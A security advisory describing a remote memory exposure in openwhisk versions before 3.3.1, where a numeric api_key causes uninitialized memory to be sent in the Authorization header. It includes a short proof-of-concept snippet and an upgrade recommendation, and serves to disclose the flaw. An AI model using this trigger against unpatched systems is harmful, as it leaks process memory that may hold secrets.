GMS-2020-756: Remote Memory Exposure in openwhisk
Versions of openwhisk before 3.3.1 are vulnerable to remote memory exposure. When a number is passed as api_key, affected versions of openwhisk allocate an uninitialized buffer of that many bytes and send its contents over the network, base64-encoded, in the Authorization header.
Proof of concept:

```javascript
var openwhisk = require('openwhisk');
var options = {
  apihost: '127.0.0.1:1433',
  api_key: USERSUPPLIEDINPUT // number: interpreted as a buffer length, not as a key
};
var ow = openwhisk(options);
// The request carries an Authorization header built from uninitialized memory.
ow.actions.invoke({actionName: 'sample'}).then(result => console.log(result))
```
Recommendation
Update to version 3.3.1 or later.